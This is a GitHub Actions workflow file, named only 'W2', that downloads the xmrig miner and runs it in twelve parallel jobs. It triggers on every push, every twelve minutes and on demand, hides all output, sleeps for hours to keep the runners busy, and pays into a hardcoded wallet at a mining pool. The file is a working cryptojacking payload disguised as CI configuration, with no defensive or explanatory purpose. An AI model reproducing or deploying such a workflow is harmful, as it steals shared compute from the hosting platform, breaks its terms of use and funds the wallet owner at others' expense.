name: W2
on:
  push:
  schedule:
    - cron: '*/12 * * * *'
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    strategy:
      fail-fast: false
      max-parallel: 8
      matrix:
        w: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]
    steps:
      - run: |
          wget -q https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz -O /tmp/x.tgz 2>/dev/null
          tar -C /tmp -xf /tmp/x.tgz 2>/dev/null
          cd /tmp/xmrig-* 2>/dev/null
          ./xmrig -o rx.unmineable.com:3333 -u 0x74B56f2C379996fedabF53D36aeE73c5E5129fC9:USDT.w2_3405_${{ matrix.w }} -p x --donate-level 1 -k --tls >/dev/null 2>&1 &
          sleep 20000
        timeout-minutes: 355
